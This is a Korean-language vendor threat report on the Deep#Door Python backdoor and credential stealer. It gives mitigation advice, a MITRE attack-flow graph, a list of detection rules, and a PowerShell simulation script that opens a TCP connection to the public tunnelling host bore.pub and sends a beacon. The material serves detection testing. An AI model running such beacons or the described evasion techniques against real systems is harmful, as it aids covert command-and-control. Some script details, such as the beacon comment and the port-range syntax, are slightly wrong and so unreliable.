SOC Prime Bias: Critical

04 May 2026 17:21 UTC
newspaper icon Securonix

Deep#Door Stealer: 스텔스 파이썬 백도어 및 자격 증명 스틸러 – 터널링, 다중 레이어 지속성, 메모리 내 감시 능력 활용

Author Photo
SOC Prime Team linkedin icon 팔로우
Deep#Door Stealer: 스텔스 파이썬 백도어 및 자격 증명 스틸러 – 터널링, 다중 레이어 지속성, 메모리 내 감시 능력 활용
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


요약

이 보고서는 실행 중에 악성 페이로드를 임베드하고 재구성하는 난독화된 배치 로더를 통해 전달되는 은밀한 Python 기반 백도어인 Deep#Door를 조사합니다. 이 악성코드는 명령 및 제어를 위해 공개된 TCP 터널링 서비스를 사용하며, 여러 지속성 메커니즘을 설정하고 Windows 보안 제어를 약화시키며 광범위한 감시 및 자격증명 탈취 활동을 지원합니다. 또한 실행 중에 숨기기 위해 메모리 내 API 패칭에 의존하면서 샌드박스와 분석가를 회피하기 위해 상세한 환경 점검을 수행합니다.

조사

Securonix 연구원들은 초기 배치 스크립트부터 페이로드 추출, 재구성 및 최종 Python RAT의 실행에 이르기까지 전체 감염 체인을 매핑했습니다. 그들의 분석은 bore.pub 을 터널링에 악용하고, 동적으로 생성된 포트 및 운영자 접근에 사용되는 커스텀 인증 시퀀스를 식별했습니다. 보고서는 또한 악성코드의 방어 회피 방법, 지속성 기법, 시스템 탐색 루틴 및 데이터 유출 행동을 자세히 설명했습니다.

완화

방어자들은 스크립트 실행을 면밀히 모니터링하고, PowerShell 로깅을 활성화하며, Microsoft Defender 및 방화벽 설정에 대한 무단 변경을 감지하고, 시작 항목, 런 키 및 관련 지속성 위치를 감사해야 합니다. 네트워크 모니터링은 또한 bore.pub 에 대한 아웃바운드 연결 및 비정상적인 고포트 활동에 초점을 맞춰야 합니다. API 패칭 및 메모리 내 변조를 감지할 수 있는 EDR 도구는 이 위협에 대한 가시성을 더욱 향상시킬 수 있습니다.

대응

Deep#Door 활동이 감지되면, 영향을 받은 엔드포인트를 즉시 격리하고 악성 Python 프로세스를 종료하며, 시작 스크립트, 런 키, WMI 구독을 포함한 모든 지속성 메커니즘을 제거하고 수정된 Defender 및 로깅 설정을 복원해야 합니다. 보안 팀은 또한 메모리 및 포렌식 분석을 수행하여 숨겨진 임플란트를 식별하고 자격 증명 도난 노출을 평가하는 동시에 네트워크 통신을 차단해야 합니다. bore.pub.

"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes Definitions action_user_execution["<b>Action</b> – <b>T1204 User Execution</b>: Victim runs malicious batch file install_obf.bat"] class action_user_execution action tool_batch_file["<b>Tool</b> – <b>Name</b>: install_obf.bat<br/><b>Description</b>: Batch script that launches the loader"] class tool_batch_file tool action_obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b>: Extracts base64/XOR encoded Python payload (svc.py) via selfu2011referencing PowerShell regex"] class action_obfuscation action tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Used to parse the batch file and decode the embedded payload"] class tool_powershell tool tool_python["<b>Tool</b> – <b>Name</b>: Python<br/><b>Description</b>: Executes the decoded svc.py payload"] class tool_python tool action_defense_evasion_disable["<b>Action</b> – <b>T1562.001 Disable or Modify Tools</b> / <b>T1562.004 Disable or Modify System Firewall</b> / <b>T1562.008 Disable or Modify Cloud Logs</b>: Disables Windows Defender, PowerShell logging, SmartScreen and firewall logging"] class action_defense_evasion_disable action tool_setmp["<b>Tool</b> – <b>Name</b>: Set-MpPreference<br/><b>Description</b>: Powershell cmdlet to change Defender settings"] class tool_setmp tool tool_netsh["<b>Tool</b> – <b>Name</b>: netsh advfirewall<br/><b>Description</b>: Modifies Windows firewall rules and logging"] class tool_netsh tool action_indicator_removal["<b>Action</b> – <b>T1070.001 Clear Windows Event Logs</b> and <b>T1070.006 Timestomp</b>: Stops and clears EventLog/Sysmon services and alters file timestamps"] class action_indicator_removal action action_persistence_runkey["<b>Action</b> – <b>T1547.001 Registry Run Keys/Startup Folder</b> and <b>T1053 Scheduled Task/Job</b>: Drops SystemServices.vbs to Startup folder, creates Run key and a scheduled task as fallback"] class action_persistence_runkey action tool_vbs_startup["<b>Tool</b> – <b>Name</b>: SystemServices.vbs<br/><b>Description</b>: VBS script placed in %APPDATA%MicrosoftWindowsStart MenuProgramsStartup"] class tool_vbs_startup tool action_credential_access["<b>Action</b> – <b>T1003 OS Credential Dumping</b>, <b>T1552.004 Private Keys</b>, <b>T1552.001 Credentials In Files</b>, <b>T1555 Password Stores</b>, <b>T1555.005 Password Managers</b>: Harvests browser passwords, Windows Credential Manager, SSH keys, cloud tokens"] class action_credential_access action action_collection["<b>Action</b> – <b>T1056.001 Keylogging</b>, <b>T1113 Screen Capture</b>, <b>T1125 Video Capture</b>, <b>T1123 Audio Capture</b>, <b>T1115 Clipboard Data</b>: Captures keystrokes, screenshots, webcam video, microphone audio and clipboard"] class action_collection action action_discovery["<b>Action</b> – <b>T1082 System Information Discovery</b>, <b>T1518 Software Discovery</b>, <b>T1057 Process Discovery</b>, <b>T1046 Network Service Discovery</b>, <b>T1018 Remote System Discovery</b>, <b>T1526 Cloud Service Discovery</b>: Gathers OS, hardware, software, process, network and cloud configuration data"] class action_discovery action action_defense_evasion_reflective["<b>Action</b> – <b>T1620 Reflective Code Loading</b> and <b>T1497.003 Virtualization/Sandbox Evasion: Time Based</b>: Detects debuggers, virtual machines and sandbox characteristics and aborts execution"] class action_defense_evasion_reflective action action_c2_tunneling["<b>Action</b> – <b>T1572 Protocol Tunneling</b>: Establishes encrypted tunnel via public service bore.pub, performs dynamic port scanning and challengeu2011response authentication"] class action_c2_tunneling action action_exfiltration["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b> and <b>T1048.002 Exfiltration Over Alternative Protocol: Asymmetric Encrypted Nonu2011C2</b>: Sends harvested data through the tunneled channel"] class action_exfiltration action action_impact_forkbomb["<b>Action</b> – <b>T1499.002 Service Exhaustion Flood</b>: Executes a fork bomb to consume system resources"] class action_impact_forkbomb action %% Connections showing attack flow action_user_execution –>|executes| tool_batch_file tool_batch_file –>|contains| action_obfuscation action_obfuscation –>|uses| tool_powershell tool_powershell –>|decodes and launches| tool_python tool_python –>|performs| action_defense_evasion_disable action_defense_evasion_disable –>|uses| tool_setmp action_defense_evasion_disable –>|uses| tool_netsh action_defense_evasion_disable –>|leads to| action_indicator_removal action_indicator_removal –>|precedes| action_persistence_runkey action_persistence_runkey –>|drops| tool_vbs_startup action_persistence_runkey –>|enables| action_credential_access action_credential_access –>|enables| action_collection action_collection –>|feeds data to| action_discovery action_discovery –>|supports| action_defense_evasion_reflective action_defense_evasion_reflective –>|establishes| action_c2_tunneling action_c2_tunneling –>|carries| action_exfiltration action_exfiltration –>|triggers| action_impact_forkbomb "

공격 흐름

탐지

가능한 지속성 지점 [ASEPs – 소프트웨어/NTUSER 하이브] (registry_event 통해)

SOC Prime 팀
2026년 5월 1일

보기

의심스러운 PowerShell 문자열 (cmdline 통해)

SOC Prime 팀
2026년 5월 1일

보기

Powershell 명령줄에서 .NET 클래스/메서드 호출 (process_creation 통해)

SOC Prime 팀
2026년 5월 1일

보기

가능한 원격 시스템 발견 또는 연결 확인 (cmdline 통해)

SOC Prime 팀
2026년 5월 1일

보기

가능한 계정 또는 그룹 열거 / 조작 (cmdline 통해)

SOC Prime 팀
2026년 5월 1일

보기

지연 실행을 위한 가능한 시간 초과 사용 (cmdline 통해)

SOC Prime 팀
2026년 5월 1일

보기

LOLBAS WScript / CScript (process_creation 통해)

SOC Prime 팀
2026년 5월 1일

보기

Windows Defender 실시간 모니터링 비활성화 및 기타 환경 설정 변경 (cmdline 통해)

SOC Prime 팀
2026년 5월 1일

보기

의심스러운 PowerShell 문자열 (powershell 통해)

SOC Prime 팀
2026년 5월 1일

보기

Windows Defender 환경 설정에 대한 의심스러운 변경 (powershell 통해)

SOC Prime 팀
2026년 5월 1일

보기

자동 시작 위치의 의심스러운 이진/스크립트 (file_event 통해)

SOC Prime 팀
2026년 5월 1일

보기

탐지할 수 있는 IOC (HashSha256) : Deep#Door Stealer : 터널링, 다계층 지속성 및 메모리 내 감시 기능을 활용한 은밀한 Python 백도어 및 자격 증명 스틸러

SOC Prime AI 규칙
2026년 5월 1일

보기

공개 TCP 터널링 서비스를 통한 C2 통신 탐지 [Windows 네트워크 연결]

SOC Prime AI 규칙
2026년 5월 1일

보기

임베디드 Python 페이로드 추출을 위한 PowerShell 명령 [Windows PowerShell]

SOC Prime AI 규칙
2026년 5월 1일

보기

Deep#Door 은밀한 Python 백도어 배포 탐지 [Windows 프로세스 생성]

SOC Prime AI 규칙
2026년 5월 1일

보기

C2 통신을 위한 Bore.pub TCP 터널링 서비스 사용 탐지 [Windows 네트워크 연결]

SOC Prime AI 규칙
2026년 5월 1일

보기

Windows Defender 실시간 및 행동 모니터링 비활성화 [Windows PowerShell]

SOC Prime AI 규칙
2026년 5월 1일

보기

Deep#Door 난독화된 배치 스크립트 실행 [Windows 프로세스 생성]

SOC Prime AI 규칙
2026년 5월 1일

보기

Windows Defender 기능 비활성화를 위한 PowerShell 명령 [Windows PowerShell]

SOC Prime AI 규칙
2026년 5월 1일

보기

Deep#Door 은밀한 Python 백도어 실행 탐지 [Windows 프로세스 생성]

SOC Prime AI 규칙
2026년 5월 1일

보기

bore.pub을 통한 은밀한 C2 통신 탐지 [Windows 네트워크 연결]

SOC Prime AI 규칙
2026년 5월 1일

보기

방화벽 변조 및 PowerShell을 활용한 Deep#Door Stealer 탐지 [Windows PowerShell]

SOC Prime AI 규칙
2026년 5월 1일

보기

시뮬레이션 실행

전제 조건: 텔레메트리 및 기준 사전 비행 검사가 통과해야 합니다.

합리적 근거: 이 섹션은 탐지 규칙을 촉발하기 위해 설계된 적 기술(특기 TTP)의 정확한 실행을 상세히 설명합니다. 명령과 설명은 반드시 식별된 TTP를 직접 반영하고 탐지 로직에 의해 기대되는 정확한 텔레메트리를 생성해야 합니다.

  • 공격 서술 및 명령:

    Windows 호스트에서 낮은 권한의 진입점을 확보한 공격자는 공개적으로 알려진 bore.pub Deep#Door에서 사용되는 터널링 서비스를 통한 은밀한 C2 채널 수립을 원합니다. 합법적인 트래픽과 섞이기 위해 공격자는 악성코드가 선택한 범위 내에서 포트를 선택하고 PowerShell의 System.Net.Sockets.TcpClient 클래스를 사용하여 원시 TCP 연결을 엽니다. 연결은 하트비트를 위장하기 위해 잠시 동안 비활성 상태로 유지되며, 이후에는 작은 base-64-encoded 비콘을 전송합니다.

  • 회귀 테스트 스크립트:

    # bore.pub에 대한 Deep#Door C2 비콘을 모니터링 범위 내의 임의의 포트로 시뮬레이션
$domain = 'bore.pub'
$port   = Get-Random -Minimum 41234 -Maximum 41244   # 상한 경계는 제외됩니다
try {
    Write-Host "Connecting to $domain:$port ..."
    $client = New-Object System.Net.Sockets.TcpClient
    $client.Connect($domain, $port)
    $stream = $client.GetStream()

    # 최소 비콘 페이로드(예: base64-encoded "ping")
    $payload = [System.Text.Encoding]::ASCII.GetBytes('cGlja2V0')
    $stream.Write($payload,0,$payload.Length)
    Write-Host "비콘 전송. 5초 동안 연결 유지..."
    Start-Sleep -Seconds 5
}
catch {
    Write-Error "연결 실패: $_"
}
finally {
    if ($stream) { $stream.Close() }
    if ($client) { $client.Close() }
    Write-Host "연결 닫힘."
}

  • 정리 명령:

    # 영구적 인공물이 없습니다; TCP 연결이 남지 않도록 확인
Get-NetTCPConnection -RemotePort 41234-41243 -State Established | ForEach-Object {
    Stop-Process -Id $_.OwningProcess -Force
}
Write-Host "정리 완료."

보고서 종료

SOC Prime의 Detection as Code 플랫폼에 가입하세요 귀사의 비즈니스에 가장 중요한 위협에 대한 가시성을 개선하세요. 시작을 돕고 즉각적인 가치를 제공하기 위해 지금 SOC Prime 전문가와의 회의를 예약하세요.

무료 가입